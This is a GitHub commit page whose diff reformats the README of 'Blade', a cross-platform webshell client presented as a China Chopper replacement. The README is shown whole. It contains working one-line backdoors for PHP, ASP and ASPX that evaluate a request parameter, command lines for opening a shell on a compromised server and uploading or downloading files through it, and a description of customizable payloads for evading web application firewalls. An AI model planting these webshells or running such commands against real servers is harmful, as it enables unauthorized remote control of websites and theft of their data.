Skip to content

Commit

Permalink
readme format
Browse files Browse the repository at this point in the history
  • Loading branch information
wonderqs committed Sep 12, 2018
1 parent 231f945 commit 4f54e72
Showing 1 changed file with 8 additions and 8 deletions.
16 changes: 8 additions & 8 deletions README.md
@@ -1,20 +1,20 @@
##Blade
## Blade
Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.
##Major functions
## Major functions
Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST["cmd"]); ?>

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management.
##Features
## Features
Cross-plaform supported (Python needed)

Customizable WAF bypass payloads

Compatible with Chooper's server side scripts
##Server side scripts examples
## Server side scripts examples
PHP:
<?php @eval($_REQUEST["cmd"]); ?>

Expand All @@ -23,7 +23,7 @@ ASP:

ASPX:
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
##Usage
## Usage
Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell
Expand All @@ -39,16 +39,16 @@ python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path l
Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path
##Current issues
## Current issues
Server side scripts supporting is not completed, currently support PHP, ASP and ASPX
ASPX file upload/download is still under development

Database management function is not completed, so can not connect databases

##TODO
## TODO
Implment JSP

Fix file handling

##Future developent
## Future developent
Beacuse I am busy sometimes, the progress of development may be a bit slow. If anyone intrest this project, welcome fork!

0 comments on commit 4f54e72

Please sign in to comment.